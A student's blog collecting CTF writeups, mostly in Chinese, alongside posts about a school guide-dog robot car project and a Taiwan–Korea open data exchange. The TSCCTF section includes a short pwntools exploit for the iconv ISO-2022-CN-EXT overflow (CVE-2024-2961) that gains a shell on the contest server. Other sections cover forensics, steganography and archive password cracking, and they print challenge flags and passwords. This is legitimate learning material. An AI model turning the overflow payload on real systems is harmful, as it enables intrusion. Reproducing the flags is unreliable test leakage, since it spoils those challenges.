xzhiyouu's Blog

TSCCTF 2026 writeup

2026-03-03T00:00:00.000Z

前言

這是我第一次打 TSCCTF，這應該是辦給大學生打的 CTF，不過有公開組就來體驗一下，最後也是打到第 13 名。雖然有些題目是 AI 打出來的，但是也讓我學到很多！

Pwn

Magic Word

程式讀取一行字串後會呼叫

iconv_open("ISO-2022-CN-EXT", "UTF-8");
iconv(cd, &inptr, &inlen, &outptr, &outlen);

且輸出 buffer 與 magic 放在同一個 packed struct：

struct {
  char output[32];
  uint32_t magic;
} __attribute__((packed)) ctx;

最後檢查

if (ctx.magic != 0) win();

所以只要讓 ctx.magic 變成非 0 就能進入 win() 拿到 shell。

經過搜尋後發現這其實是 CVE-2024-2961

漏洞原理參考：https://hackmd.io/@yjk930805/HJzCZdtLxx

from pwn import *

context.binary = ELF("./magic_word")
context.log_level = "info"

io = remote("172.31.3.2", 40002)

payload = b"A" * 31 + "劄".encode("utf-8")

io.recvuntil(b"Magic word: ")
io.sendline(payload)

io.interactive()

writeup 尚未完成

PwnSec CTF 2025 Forensics-HiddenData writeup

2025-11-18T00:00:00.000Z

CTFtime: https://ctftime.org/event/2906

下載後會發現是一個Windows的檔案

題目敘述提到了 chatting ，所以可能跟 Discord 有關
上網找了一下有關 Discord chatting Forensics 的資料
找到這篇報告 link
可以發現 Discord 的聊天紀錄都會儲存在 \AppData\Roaming\discord\Cache\Cache_Data 這個快取裡面，並且報告中提到可以使用 ChromeCacheView 這個工具檢視 Discord 的快取檔案

找到有 /messages?limit=50 的檔案
打開後可以發現這個

  {
    "type": 0,
    "content": "Got it I'll copy it now",
    "mentions": [],
    "mention_roles": [],
    "attachments": [],
    "embeds": [],
    "timestamp": "2025-10-31T10:18:20.453000+00:00",
    "edited_timestamp": null,
    "flags": 0,
    "components": [],
    "id": "1433762006892023870",
    "channel_id": "1429495896353280162",
    "author": {
      "id": "1377987216671772784",
      "username": "username12345_12345",
      "avatar": null,
      "discriminator": "0",
      "public_flags": 0,
      "flags": 0,
      "banner": null,
      "accent_color": null,
      "global_name": null,
      "avatar_decoration_data": null,
      "collectibles": null,
      "display_name_styles": null,
      "banner_color": null,
      "clan": null,
      "primary_guild": null
    },
    "pinned": false,
    "mention_everyone": false,
    "tts": false
  },
  {
    "type": 0,
    "content": "After 5 minutes, the password will be deleted.",
    "mentions": [],
    "mention_roles": [],
    "attachments": [],
    "embeds": [],
    "timestamp": "2025-10-31T10:17:47.513000+00:00",
    "edited_timestamp": null,
    "flags": 0,
    "components": [],
    "id": "1433761868731912332",
    "channel_id": "1429495896353280162",
    "author": {
      "id": "1427528808570814615",
      "username": "zero____day0",
      "avatar": null,
      "discriminator": "0",
      "public_flags": 0,
      "flags": 0,
      "banner": null,
      "accent_color": null,
      "global_name": null,
      "avatar_decoration_data": null,
      "collectibles": null,
      "display_name_styles": null,
      "banner_color": null,
      "clan": null,
      "primary_guild": null
    },
    "pinned": false,
    "mention_everyone": false,
    "tts": false
  },
  {
    "type": 0,
    "content": "Here’s the secret link — https://pastebin.com/AAGyxC3p",
    "mentions": [],
    "mention_roles": [],
    "attachments": [],
    "embeds": [
      {
        "type": "link",
        "url": "https://pastebin.com/AAGyxC3p",
        "title": "Pastebin.com - Locked Paste",
        "description": "Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.",
        "provider": {
          "name": "Pastebin"
        },
        "content_scan_version": 0
      }
    ],
    "timestamp": "2025-10-31T10:17:20.211000+00:00",
    "edited_timestamp": null,
    "flags": 0,
    "components": [],
    "id": "1433761754219020439",
    "channel_id": "1429495896353280162",
    "author": {
      "id": "1427528808570814615",
      "username": "zero____day0",
      "avatar": null,
      "discriminator": "0",
      "public_flags": 0,
      "flags": 0,
      "banner": null,
      "accent_color": null,
      "global_name": null,
      "avatar_decoration_data": null,
      "collectibles": null,
      "display_name_styles": null,
      "banner_color": null,
      "clan": null,
      "primary_guild": null
    },
    "pinned": false,
    "mention_everyone": false,
    "tts": false
  },

發現 https://pastebin.com/AAGyxC3p
但進去後要輸入密碼才能打開
從聊天紀錄推測出他複製了密碼
所以必須從 Windows 的紀錄中找到他到底複製了什麼
上網爬了一下資料發現這個文章 link
使用者的很多行為都會記錄在 \AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db 之下
這邊使用 DB Browser for SQLite 去看這個 database

解碼 base64 之後發現密碼是 Th1$_1$_r3@l_p@$$w0rd!

貼到剛剛對話中出現的連結後就可以拿到 flag 了

Flag: flag{12d65e001866f854c23a48f0d47957ed}

V1t CTF 2025 writeup

2025-11-03T00:00:00.000Z

CTFtime: https://ctftime.org/event/2920

Author: xzhiyouu

Please don’t mind my broken English.

This is the first CTF I played with Flagaholic.
We got TOP 5 in the end.
There were a total of 1237 participating teams.
Thanks to my teammate and I
Final Scoreboard here~

I will write writeups for some interesting or guessy challenges.

[Misc] Dont Bother

This challenge was too guessy, so out of more than 1,200 teams, only 16 managed to solve it.

Here’s my solution.

The image is 512×512 and in RGB format. Most pixels share the same base color (64, 77, 205).

Some pixels have been increased by 2 in certain channels (only 0 or +2, never a decrease), so they differ slightly from the base color.

The image is divided into many small square blocks, and only those along the main diagonal contain these “+2 footprints.”

In each diagonal block, if you sum up all the “+2 occurrences” of its pixels, you get an integer.

That sequence of integers represents ASCII codes, which together form the flag.

Solution code~

from PIL import Image
import numpy as np

img = Image.open("chal.jpg").convert("RGB")
arr = np.array(img, dtype=np.uint8)
base = np.array([64, 77, 205], dtype=np.int32)

delta = arr.astype(np.int32) - base
steps = np.clip(delta, 0, None) // 2
steps = steps.sum(axis=2)

n = 32
h, w = steps.shape
bh, bw = h // n, w // n
codes = []
for i in range(n):
    block = steps[i*bh:(i+1)*bh, i*bw:(i+1)*bw]
    codes.append(block.sum())

flag = ''.join(chr(c) for c in codes).rstrip('\x00')
print(flag)
# v1t{c4nt_B3_both3r3d_vnkud1837}

GUESSY CHALL :>

[Misc] MOOOO

This is a cool challenge lol

You can find comment with COW programming language through exiftool.

After running the code, we got thismaybeapasswordbutwhoreallyknowsimjustmessginitisapassword

Do steghide to MOOOO.jpeg, and got TRYYY.txt there are many invisible spaces in the .txt file

Since I played SCIST Final CTF before, someone made a tool for solving this problem.

Got the flag v1t{D0wn_Th3_St3gN0_R4bb1t_H0l3}

[Forensics] Tryna crack?

This challenge also guessy, many people try to brute force the zip file password, but actually you can solve it with the tool “bkcrack”

I got quackquackquack.png after extracting challenge.zip.

After checking with exiftool, I found a comment that says password for zip file =)))) D4mn_br0_H0n3y_p07_7yp3_5h1d

BUT THE FLAG ISN’T v1t{D4mn_br0_H0n3y_p07_7yp3_5h1d}

lots of people are stuck here lol

I looked deeper and tried adjusting the image’s width and height, then got this.

The Morse code below translates to “SHA512.”

So it’s clear that the flag is supposed to be the SHA-512 of D4mn_br0_H0n3y_p07_7yp3_5h1d.

Got flag v1t{7083748baa3a42dc0a93811e4f5150e7ae1a050a0929f8c304f707c8c44fc95d86c476d11c9e56709edc30eba5f2d82396f426d93870b56b1a9573eaac8d0373}

資訊班成發專題 - 導盲犬機器車

2025-09-01T00:00:00.000Z

專題發想與主題選定

成發的結束，也代表著資訊班的一個里程碑。我們從很早之前就開始思考專題要做什麼才好，什麼樣的主題可以讓我們顯得與眾不同。當時看到大部分組別都選擇做遊戲，因此我們這組想挑戰一個實體物品，並結合程式設計。最後，我們選擇了導盲犬作為主題，嘗試製作一台導盲犬機器車。

初期

一開始我們五個人都非常投入，積極研究專題內容，有人負責尋找合適的硬體設備，有人規劃整體製作流程。雖然最後我們獲得了人氣獎，但整個過程真的非常不容易。

過程

我和其中一位組員基本上扛起了大部分的專題製作進度，甚至週末也會自己約出來趕工。我們有時也會在最後一堂課後留下來製作，老師也常常陪著我們一起努力。

我印象最深的是有次 GPS 模組一直收不到訊號，試了很多方法都沒有效果，後來有人提議試著走到戶外，結果一到外面馬上就收到訊號了；還有一次導盲車完全動不了，程式明明寫好了卻灌不進 micro 的板子裡，結果另一位組員走過來隨手按了一下就成功了…

我們這個主題其實難度不小，而我們組員中還有人身兼總召的工作，負責整體活動的統籌工作，事情很多卻仍然盡力兼顧專題進度。我和另一位組員還記得，在大家去國際會議廳排練時，我們仍在後方的台階處趕進度，為了解決小車的轉向和直行問題花了好幾週的時間。

設計

原本我們的小車還計畫使用 3D 列印方式重新設計外觀，但因時間有限，最後只好放棄這個想法。希望未來有機會能做出來展示。

影片剪輯與回憶錄製作

除了專題之外，我還負責了一件很重要的任務，就是影片剪輯。除了中場後那段影片，最重要的就是回憶錄影片了。

在剪輯回憶錄時，配樂選擇是最困難的部分。我一開始選了 Taylor Swift 的《Long Live》，也有人提議選的是陳勢安的《勢在必行》，原本想都選中文歌，但因為我平常幾乎都聽英文歌，最後只有一首能合唱。後來為了配上更多照片素材，又加入了 Gracie Abrams 的《That’s So True》，我覺得這首歌充滿活力，只是英文歌比較難跟大家一起合唱。

這支回憶錄影片其實是在成發前幾個小時才完成，當天我也一直在休息室處理影片細節，調整拍子與上字幕。影片完成的那一刻，真的成就感滿滿！

未來期許

總之，成發順利結束了，留下了許多寶貴的回憶。接下來就是學測的準備，希望自己能為未來努力幾個月，讓高中三年的努力有所收穫，不留遺憾！

2025 Taiwan & Korea Open Data Analysis Project

2025-08-29T00:00:00.000Z

Written by Hsieh Chih-Yu

Daily Activity Sketch

Date	Activity
Aug 19	Meet study partners, ice-breaking, open data introduction
Aug 20	Project idea and making
Aug 21	Project sharing, visit Google office

Memorable Highlights

Working and learning with Korean partners
Visiting Google’s office in Taipei 101

Reflections

這次很高興有機會可以成為班上前20名的同學代表參加臺韓學生交流公開資料分析專題的活動，從第一天的會面到第三天的Google參訪，真的是收穫滿滿。

首先，第一天抵達了國立師範大學和平校區，在那裡見到了我的兩位韓國學伴，雖然很想趕快與他們交流溝通，但是因為語言的不通，我們最後仍以訊息傳送的方式了解彼此。這次的上課老師是 JP老師，剛開始的時候老師為了拉近與學生的距離，特別挑了一支舞蹈邀請我們暖暖身，接著就是重要的公開數據介紹了。老師講解了公開數據的三個特點、如何五步驟完成公開資料專案，並介紹了幾種數據處理的方式。

再來輪到我們發想專題，我們最後決定以「臺灣與韓國的老年人口」為主軸做發想，製作了「Cheonwan」專題，並且成功在第三天的發表會上展示了我們的成果，也如願參觀了Google的辦公室，從77樓俯瞰下去，景色真的很漂亮！謝謝羅老師給了我機會參加這次活動！

I was very happy to be one of the top 20 students in my class to join the Taiwan-Korea Student Exchange: Open Data Analysis Project. From the first day’s meeting to the third day’s Google office visit, I learned a lot.

On the first day, I went to NTNU Hoping Campus and met my two Korean partners. I wanted to talk with them, but because of language problems, we mostly used messages to communicate. The teacher, Professor JP, started with a short dance to help us feel relaxed, then gave an introduction to open data. He explained three features of open data, a five-step process to finish a project, and some methods for data processing.

For our project, we chose the topic “Elderly Population in Taiwan and Korea” and created “Cheonwan.” On the third day, we presented our work successfully and then visited Google’s office. The view from the 77th floor was amazing. I am very thankful to Professor Lo for giving me this chance to join the event.

Event Photos

JP teaching
Group partners
Practicing presentation
Professor Lo and JP
Presenting at Google
Group photo

Project Presentation

View on Website: Link
View on Canva: Link

Attachments

Tool I made for analyzing CSV files and making charts (GitHub Link)

Public Data Project Guide

2025-08-20T00:00:00.000Z

Introduction

Public data refers to information created and managed by government or public organizations that is freely available to anyone. This valuable resource can be used to improve the world.

Key Benefits:

Free Usage: Most public data is free to use.
Freedom of Use: It can be utilized for educational, research, business, and other purposes.
Creating New Value: Data processing can lead to innovative services or applications.

5-Step Guide to Completing a Public Data Project

1. Define the Problem

The first step is to define the problem you aim to solve. This could range from small inconveniences to larger societal issues.

2. Collect Data

Once the problem is defined, gather the necessary data to address the issue.

3. Analyze Data

The next step is to process and analyze the collected data for insights.

4. Propose Solutions

Based on the data analysis, suggest potential solutions to the problem.

5. Publish Results

Finally, share your findings and solutions with the public.

Core Technologies

Big Data Analytics: Tools for handling large volumes of data.
Data Visualization: Representing data through charts and graphs for better understanding.
Machine Learning: Using algorithms to improve decision-making and predictions.

Success Tips

Ensure proper data privacy to avoid leaks or misuse.
Use interactive methods to present the data for better engagement and understanding.

Conclusion

Public data can be a powerful tool for innovation. By following these steps and leveraging the right technologies, one can create impactful solutions.

資安實務素養「自主學習」 CTF 挑戰賽

2025-05-15T00:00:00.000Z

心得

因為我的資訊老師是 isip 的中心老師，所以我們有這個機會可以接觸到更多有關資安的知識。我對資安這個領域充滿興趣，平時就會找線上的 CTF 平台練習，偶爾會看看 CTFtime 上有什麼比較簡單的比賽可以讓我試水溫，也因為這樣，我覺得這個 CTF 挑戰賽的題目偏簡單，但也讓我多了學習資安的機會。

參賽證明

個人賽

ROT 47 [10]

你知道下列文字如何解密嗎？$F3DE:EFE:@? r:A96C

請把解開的內容變成 Flag 格式，如解開 AABBCCDD，請變成 CTF{AABBCCDD}
Key 格式：CTF{您的答案}

使用線上解密：https://www.dcode.fr/rot-47-cipher

Flag: CTF{Substitution Cipher}

Morse Code 解碼 [20]

描述：編碼與解碼是資訊領域日常都在使用的技術，如 ASCII、Base64、Base32 各有其適用處，請問你對 Base64 編碼與解碼的技術了解嗎？

你知道如何解碼下列資訊嗎？
.- .-.. ..-. .-. . -.. / .-.. . .-- .. ... / ...- .- .. .-.. / .-.-. / -- --- .-. ... .

Key 格式：CTF{您的答案}

使用線上解密：https://morsecode.world/international/translator.html

Flag: CTF{ALFRED LEWIS VAIL + MORSE}

被關的凱撒 [50]

凱撒大帝被敵人抓住後，關在一個 5 階的柵欄中。他寫了一個求救文，而您能從中找出關鍵資料來拯救他嗎？
Key 格式：CTF{您的答案}

題目附加檔案：GDS.zip，解壓後得到 GDS.txt。

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ unzip GDS.zip
  inflating: GDS.txt
xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ cat GDS.txt
AH6sxcffw1cjio1oxrr9uf/dmnwP:jt3axq:8stu

從題目敘述可推得密文使用 Caesar cipher 與 Rail fence cipher。不過這題的 Rail fence 並非 W 型，而是將明文平均切成 N 等份後依序排列。

找到線上解密工具：https://www.metools.info/code/fence155.html

解密結果：Account:Hfjxfw386fir/Password:xtx119mjqu

再將兩段字串做 Caesar cipher decode，即可得到最終 flag。

Flag: CTF{Caesar386adm/sos119help}

瑪麗皇后的智慧 [50]

Mary Queen 瑪麗·史都華密碼。
提示：你了解附圖的文字意思嗎？
Key 格式：CTF{您的答案}

上網搜尋可找到解密工具：https://www.dcode.fr/mary-stuart-code

Flag: CTF{STEGANOGRAPHCRYTOGRAPHY}

ROT13 [50]

ROT13 是一種簡單的凱撒密碼，它將字母表中的每個字母向右移動 13 位。
PGS{TBBQ QNL! E.B.P.}
Key 格式：CTF{您的答案}

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ echo "PGS{TBBQ QNL! E.B.P.}" | rot13
CTF{GOOD DAY! R.O.C.}

Flag: CTF{GOOD DAY! R.O.C.}

文字變亂碼 [50]

小華向 MIS 人員說明，客戶寄來的信都變成了亂碼。您能幫他還原成正常的文字嗎？
檔案：Email.7z
Key 格式：CTF{您的答案}

解壓後得到 Email.txt，內容明顯是 base64 編碼：

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ cat Email.txt
6Iqx6JOu5LiA5ZCN5LqU...（略）
xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ echo "6Iqx6JOu..." | base64 -d
...
CTF{**eMAIL**bas64**}

Flag: CTF{**eMAIL**bas64**}

維吉尼爾密碼 [50]

維吉尼爾密文為？ Vhixoieemksktorywzvhxzijqni
提示：凱撒就是一切，但他把凱撒密法提升到了一個新的層次。
參考：https://www.guballa.de/vigenere-solver
Key 格式：CTF{您的答案}

Flag: CTF{Theforceisstrongwiththisone}

團體賽

NIST 資安風險管理 [30]

描述：請觀察附圖，NIST 提出的網路安全框架 CSF。
提示：NIST 核心，key 為 5 位數，順時針方向、識別 1、保護 3、偵測 3、回應 5、復原 1 的每個類別一共有幾個分項數？
Key 格式：CTF{您的答案}

Flag: CTF{68521}

詩文寄情 [50]

一首詩文，內有什玄機？
Key 格式：CTF{您的答案}

給了一個 Word 檔，開啟隱藏字元後可見 flag。

Flag: CTF{Cipher/Cvy36}

Strings it!!! [50]

描述：使用一些指令來幫助您找到字串中的旗標。
Key 格式：CTF{您的答案}

題目附加檔案：strings

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ strings strings | grep CTF
picoCTF{5tRIng5_1T_7f766a23}

Flag: CTF{5tRIng5_1T_7f766a23}

Metadata 元資料 [80]

內容：檔案的元資料總是可以更改。你能找到那面旗幟嗎？
提示：1. 檢視圖片檔案元資料詳細內容 2. 運用線上 base64decode.org 解開 base64 編碼
Key 格式：CTF{ }

題目附加檔案：rabbit-6.jpg

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ exiftool rabbit-6.jpg
...
XP Keywords  : Q1RGezIwMjQgOS8yNSAxNTAwIOW3pueHn+mrmOmQtTctMTHopot9
Subject      : Q1RGezIwMjQgOS8yNSAxNTAwIOW3pueHn+mrmOmQtTctMTHopot9

找到 base64 編碼字串後解碼得到 flag：

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ echo "Q1RGezIwMjQgOS8yNSAxNTAwIOW3pueHn+mrmOmQtTctMTHopot9" | base64 -d
CTF{2024 9/25 1500 左營高鐵7-11見}

Flag: CTF{2024 9/25 1500 左營高鐵7-11見}

黑與白 [100]

黑白之間，藏有重要資訊，請將他找出來吧。
Key 格式：CTF{ }

題目給了 base64 編碼過的圖片資料，解碼後得到 QR code。

拿去線上掃描或手機掃描即可得到 flag。

Flag: CTF{OKS5543/891HHFR}

Doraemons 俄羅斯娃娃 [100]

提示：在 Kali Linux 中應用 binwalk 尋找 Doraemons.jpg 中的 Key。
Key 格式：isipCTF{AABBCCDD}

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ binwalk Doraemons.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
0             0x0             JPEG image data, JFIF standard 1.01
18043         0x467B          Zip archive data ... name: 2_with_3.jpg
37726         0x935E          End of Zip archive

使用 binwalk -e 一路解到底，最終在最深層找到 flag：

xzhiyouu@DESKTOP-9SMADFC:~/.../isipCTF$ strings 4_with_flag.jpg | grep CTF
isipCTF{336cf6d51c9d9774fd37196c1d7320ff}

# 或直接 cat 最底層的 flag.txt
xzhiyouu@DESKTOP-9SMADFC:~/.../isipCTF$ cat flag.txt
isipCTF{336cf6d51c9d9774fd37196c1d7320ff}

Flag: isipCTF{336cf6d51c9d9774fd37196c1d7320ff}

小熊維尼 Winnie [100]

密碼為：isip2024
使用工具：https://futureboy.us/stegano/decinput.html
Key 格式：CTF{您的答案}

使用 steghide 提取隱藏資料：

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ steghide extract -sf winnie-the-poohsteg.jpg
Enter passphrase:
wrote extracted data to "steganopayload147315.txt".
xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ cat steganopayload147315.txt
Q1RGe1RoZSBNYW55IEFkdmVudHVyZXMgb2YgV2lubmllIHRoZSBQb29ofQ==
xzhiyouu@DESKTOP-9SMADFC:~/isipCTF$ echo "Q1RGe1RoZSBNYW55IEFkdmVudHVyZXMgb2YgV2lubmllIHRoZSBQb29ofQ==" | base64 -d
CTF{The Many Adventures of Winnie the Pooh}

Flag: CTF{The Many Adventures of Winnie the Pooh}

尋找線索 [100]

小明刑警從駭客筆電中找到了一個可疑檔案，懷疑檔案內容中有重要線索，您能幫忙找出來嗎？
本題答案由兩組字串組成 Key 格式：CTF{您的答案1+您的答案2}

題目附加檔案：SXB.zip，解壓後得到 AccessControl.rar 和 HRdb.mdb。

AccessControl.rar 有密碼，先從 HRdb.mdb 下手：

xzhiyouu@DESKTOP-9SMADFC:~/isipCTF/SXB$ mdb-tables HRdb.mdb
員工名單 檔案資訊
xzhiyouu@DESKTOP-9SMADFC:~/isipCTF/SXB$ mdb-export HRdb.mdb 檔案資訊
NO,EMPID,Account,Pwd,FilePWD
"TG001","EM348","Paul","ZTSW1E","pvYp8se247"
"TG002","HB035","Tony","nBUGV8","bFE8ek5133"
"TG005","HB084","Peter","BoUEvZ","WQ6f6f3859"
"TG003","HB407","Amy","TqyHyG","ylhpakj152"
"TG004","HB720","Yvonne","ag1WVK","aRwt9nb020"
"TG006","HB922","Rich","UCuOPE","qGF7tag158"

暴力嘗試後得到壓縮檔密碼 WQ6f6f3859，解壓得到 Access Control.pst。

使用線上工具 https://goldfynch.com/pst-viewer/ 開啟後找到 flag。

Flag: CTF{security+4Cc3ssC0ntr0ller}

UWSP Pointer Overflow CTF writeup

2024-11-12T00:00:00.000Z

CTFtime: https://ctftime.org/event/2121/

player: xzhiyouu

Web 100 - The Way Out is Through

Problem description

The question provided a link, so I clicked on it, but there was nothing there. So I switched to the source code to look at it, and found that the flag seemed to be divided into five parts.



  
    
    
    TTiOT
  
  
    Not Found
    The requested URL /snazzy-dump-pics.html was not found on this server.
    
    Apache/1.1.3 (Ubuntu) Server at localhost Port 1337

let part_1 = [112, 111, 99, 116].map(x => String.fromCharCode(x)).join('');

This line converts each number in [112, 111, 99, 116] to a character (ASCII values).
So the result of part_1 will be poct

let part_2 = atob("Znt1d3NwXw==");

This part uses atob() to decode a Base64 string
The result of part*2 will be f{uwsp*

let part_3 = "document.cookie";

This sets a cookie value in document.cookie using Unicode escape sequences.
We can see the value of document.cookie below.

document.cookie = "\u0037\u0068\u0033";

The result of part_3 will be 7h3

let part_4 = "XzdydTdoXw==";

Just another Base64 string to decode.
The result of part*4 will be \_7ru7h*

part_5_hex = [0x31, 0x35, 0x5f, 0x30, 0x75, 0x37, 0x5f, 0x37, 0x68, 0x33, 0x72, 0x33, 0x7d];

This is an array of hexadecimal values representing ASCII characters.
The result of part_5 will be 15_0u7_7h3r3}

So just put all the broken flags together to get the final answer. poctf{uwsp_7h3_7ru7h_15_0u7_7h3r3}

Web 100 - Giving Up the Game

Problem description

It’s also a Web question type…
You will see a game called Space Adventure starting up and spinning for a long time.
We check the source code first.
So I got this.


  
    Loading Space Adventure... Please wait.

    
      
    

    

    Tip: Collect all power-ups to upgrade your ship! 💥

I saw a string at the bottom that looked like Base64, so I took it to decode it.
The result will be: Thank you Mario! But our princess is in another castle!
Okay, this doesn’t look like a flag.
After carefully checking the code, I found a path called /getSprites
Entering the page, I got another string of Base64
cG9jdGZ7dXdzcF8xXzdIMW5rXzdIM3IzcjBfMV80bX0=
Okay, let’s take it to the decoder to decode it.
Then I got the right flag!
poctf{uwsp_1_7H1nk_7H3r3r0_1_4m}